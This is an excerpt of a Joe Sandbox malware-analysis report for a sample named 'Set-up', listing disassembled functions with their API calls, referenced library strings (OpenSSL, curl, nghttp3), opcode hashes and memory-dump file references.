                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: %-18s$%5ld:d=%-2d hl=%ld l=%4ld %s$%5ld:d=%-2d hl=%ld l=inf %s$(unknown)$<ASN1 %d>$BAD RECURSION DEPTH$Error in encoding$appl [ %d ]$cons: $cont [ %d ]$length is greater than %ld$prim: $priv [ %d ]
                                • API String ID: 0-2568808753
                                • Opcode ID: ee34a575e83f72ee958e210088de8f20646e6c72a3434c98e6efcb757933a3c0
                                • Instruction ID: 442b0a9993b5af0e59ce6ae8566290d18ed872f7ec74969414974fcb4f35858d
                                • Opcode Fuzzy Hash: ee34a575e83f72ee958e210088de8f20646e6c72a3434c98e6efcb757933a3c0
                                • Instruction Fuzzy Hash: C4E1E379529316AFD720BE14DC41B2FB7E5AF84744F04482DF989932C2E7B5E9208B83
                                Function 0011A960 Relevance: 15.0, APIs: 3, Strings: 6, Instructions: 1493COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                • API String ID: 0-2555271450
                                • Opcode ID: 118d4a983629975567ac8f091ad59eef4d5993e28c444ceffc2f28f9828a17b7
                                • Instruction ID: 61b1af21023b2429286448d27dce027b6672cd2a07661530c0491330533e275e
                                • Opcode Fuzzy Hash: 118d4a983629975567ac8f091ad59eef4d5993e28c444ceffc2f28f9828a17b7
                                • Instruction Fuzzy Hash: 81C26A7160C3418FCB18CF29C4D06AAB7E2AFD9314F15893DE89A9B351D734ED858B82
                                Function 00480460 Relevance: 12.0, APIs: 5, Strings: 2, Instructions: 1488COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 004806A3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: $
                                • API String ID: 3510742995-227171996
                                • Opcode ID: a06d0727aae60a62495961a5ef04ba1441a8261550d2cb222952530f38ea2ff4
                                • Instruction ID: 1cf6aa62d0e99fcffb4cc3818bf5c532e84f01bd31d3131e60659121ac1e5e78
                                • Opcode Fuzzy Hash: a06d0727aae60a62495961a5ef04ba1441a8261550d2cb222952530f38ea2ff4
                                • Instruction Fuzzy Hash: 2DD2A072A087558FC724DF28C88026EF7E1FFC9304F158A2EE99997351D774A846CB86
                                Function 003587D0 Relevance: 11.1, APIs: 6, Strings: 1, Instructions: 565COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00358A66
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00358A88
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00358B45
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00358B59
                                Strings
                                • providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00358A42, 00358F13
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
                                • API String ID: 1297977491-3184136495
                                • Opcode ID: c433adae97f61928431c2441fa313cc9b15ee3b08b68b0e33cd3750a7c5d1630
                                • Instruction ID: 089a079f5c2d5c4f2312f55a3c1d5ce2164cb1f6c6d5e97c6b593f70bd3d1ab7
                                • Opcode Fuzzy Hash: c433adae97f61928431c2441fa313cc9b15ee3b08b68b0e33cd3750a7c5d1630
                                • Instruction Fuzzy Hash: C122E2725087419FD712CF24C881BABBBE4FF96345F084A1DF89597292DB30E949CB92
                                Function 00494780 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 446stringCOMMON
                                Download Yara Rule
                                APIs
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 004947A3
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 004947C1
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00494800
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00494D16
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _strdupmemcpystrchrstrlen
                                • String ID: H$xn--
                                • API String ID: 1602650251-4022323365
                                • Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                • Instruction ID: 2a8d5e537dac38698d2a61e80d561e487182b3de5b8e376fe9ddce112f0ef8c2
                                • Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
                                • Instruction Fuzzy Hash: E3E118716087154FDB18DE28D8C0A2ABBD2ABC5314F198B3ED99687385E778DC07874A
                                Function 0041C050 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 304COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0041C090
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 0041C0BE
                                Strings
                                • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 0041C0D2, 0041C266
                                • assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 0041C433
                                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 0041C0CD, 0041C26B
                                • crypto/evp/encode.c, xrefs: 0041C42E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
                                • API String ID: 3510742995-2458911571
                                • Opcode ID: 0faad8bc0254b78253eddf97c928a27003f21047b0269de883dcd4d22cc30bc2
                                • Instruction ID: 2b92d99943091aae3d8557eca7fad481542381deca961da924680b681a7c7489
                                • Opcode Fuzzy Hash: 0faad8bc0254b78253eddf97c928a27003f21047b0269de883dcd4d22cc30bc2
                                • Instruction Fuzzy Hash: 5CC10A7560C3958FC715CF58C89076ABBE1AF96304F0989AEF8D58B382D338E945CB52
                                Function 00272430 Relevance: 8.0, Strings: 4, Instructions: 2966COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$ssl/quic/quic_txp.c
                                • API String ID: 0-600063881
                                • Opcode ID: 77629711454b6b7c94628850b19d2dea4101470affd80c82c5c567196464e062
                                • Instruction ID: 8de2ab82da86fc06850ac0260fbb543f6e7ca166f748db9a50f7ac6d5bb945c4
                                • Opcode Fuzzy Hash: 77629711454b6b7c94628850b19d2dea4101470affd80c82c5c567196464e062
                                • Instruction Fuzzy Hash: E353D171A183428FD724DF28C881BAAB7E5BF84314F14892DE89D97391E771E954CF82
                                Function 00176210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: default$login$macdef$machine$netrc.c$password
                                • API String ID: 0-1043775505
                                • Opcode ID: f35252e4e3167de2afbe0365010fbd69635b41997c29c3f107f0ac2a7b5f3905
                                • Instruction ID: e304eef3e6905e9abc7c98ea1cb8eaefe84fc1637aa27592cab3381e62850db1
                                • Opcode Fuzzy Hash: f35252e4e3167de2afbe0365010fbd69635b41997c29c3f107f0ac2a7b5f3905
                                • Instruction Fuzzy Hash: 71E1117050C7519FE3149E209885B6FBBF4AF95748F18882CF9CD5B282E3B59948CB92
                                Function 002800F0 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 404stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,00302212,00000000,00000000), ref: 00280109
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$strcpy
                                • String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
                                • API String ID: 2790333442-843477118
                                • Opcode ID: 3d45becf2307d87280054217aaad4f4874951b1c2830334ca9b96a2d7d21da5a
                                • Instruction ID: 78d6ba0e18468d1d225ebba03587c9fcd9751885a135ab71d4a887d62b7c9274
                                • Opcode Fuzzy Hash: 3d45becf2307d87280054217aaad4f4874951b1c2830334ca9b96a2d7d21da5a
                                • Instruction Fuzzy Hash: 79E17B7592D3118BD761AF28C8C171EB7E1AF91750F048B2DF8D8672D2E374D8688B82
                                Function 001BE070 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 436COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,001BC1CE,?,00000003,?), ref: 001BE4EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
                                • API String ID: 1222420520-1997541155
                                • Opcode ID: 85b9c6d69495a1eb46fc5097e910b14351f68016cbfb95ec148248e7916b50d8
                                • Instruction ID: e76a438fbbaa0273fbb45aa011d9813035402f5d7472981fa103ecdbe434c962
                                • Opcode Fuzzy Hash: 85b9c6d69495a1eb46fc5097e910b14351f68016cbfb95ec148248e7916b50d8
                                • Instruction Fuzzy Hash: 65E1F636B042105BD7199E3CC8907AAB7D7ABD9310F298A3CE9AAC73D1D735DC498781
                                Function 0037E5D0 Relevance: 5.1, APIs: 3, Instructions: 1393COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 0037E5F2
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0037E67F
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0038003E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: ee48a486b07c62266a25f64f0da40119ab4e9c98a618147de80709643d9cc1b4
                                • Instruction ID: 5be72ae49c107ae1b209f9b8ff19f2c2a3f15bb6dedf114b6217d36f0a0c1ad0
                                • Opcode Fuzzy Hash: ee48a486b07c62266a25f64f0da40119ab4e9c98a618147de80709643d9cc1b4
                                • Instruction Fuzzy Hash: FCD21DAAC39B9541E323A63D68122E6E7506FFB188F51E72BFCD430E52AB2175C4431D
                                Function 0048E940 Relevance: 4.9, Strings: 3, Instructions: 1163COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4$`$`
                                • API String ID: 0-1230936812
